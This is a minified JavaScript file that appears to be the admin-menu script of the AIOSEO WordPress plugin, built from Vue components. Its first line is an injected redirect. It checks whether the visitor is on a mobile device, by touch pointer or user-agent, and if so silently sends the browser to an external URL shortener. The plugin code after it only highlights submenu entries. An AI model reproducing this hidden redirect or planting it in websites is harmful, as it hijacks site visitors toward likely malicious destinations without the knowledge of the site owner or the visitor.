(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{f as a,i,M as c,an as l}from"./js/vendor-vue-ui.232c7c36.js";import{_ as u}from"./js/_plugin-vue_export-helper.eefbdd86.js";import"./js/vendor-other.39e59221.js";const p={data(){return{display:!1,interval:null}},methods:{addMenuHighlight(){const t=document.querySelector("#toplevel_page_aioseo");if(!t)return;t.querySelectorAll(".wp-submenu li").forEach(e=>{const o=e.querySelector("a");if(!o)return;const n=o.querySelector(".aioseo-menu-highlight");if(n){e.classList.add("aioseo-submenu-highlight"),n.classList.contains("red")&&e.classList.add("red");const r=e.querySelector("a");r&&n.classList.contains("lite")&&r.setAttribute("target","_blank")}})}},created(){this.addMenuHighlight()}},d={key:0};function m(t,s,e,o,n,r){return n.display?(a(),i("div",d)):c("",!0)}const _=u(p,[["render",m]]);document.getElementById("aioseo-admin")&&l({..._,name:"Standalone/App"}).mount("#aioseo-admin");
